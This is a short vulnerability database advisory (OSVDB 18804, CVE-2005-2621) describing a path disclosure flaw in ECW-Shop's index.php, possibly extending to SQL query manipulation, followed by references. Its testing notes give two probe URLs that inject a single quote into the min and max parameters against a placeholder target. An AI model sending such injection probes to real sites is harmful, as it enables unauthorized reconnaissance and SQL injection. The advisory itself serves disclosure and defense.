ECW-Shop index.php Multiple Variable Path Disclosure

2005-08-15T05:59:09
ID: OSVDB:18804
Type: osvdb
Reporter: OSVDB
Modified: 2005-08-15T05:59:09

Description

Technical Description

This vulnerability may potentially be more serious, allowing the manipulation of SQL queries.

Manual Testing Notes

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

References:

Vendor URL: http://www.soft4e.com/
Security Tracker: 1014734
Secunia Advisory ID: 16459
Related OSVDB ID: 18805
Related OSVDB ID: 18806
Other Advisory URL: http://www.nobytes.com/nobytes9.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0213.html
CVE-2005-2621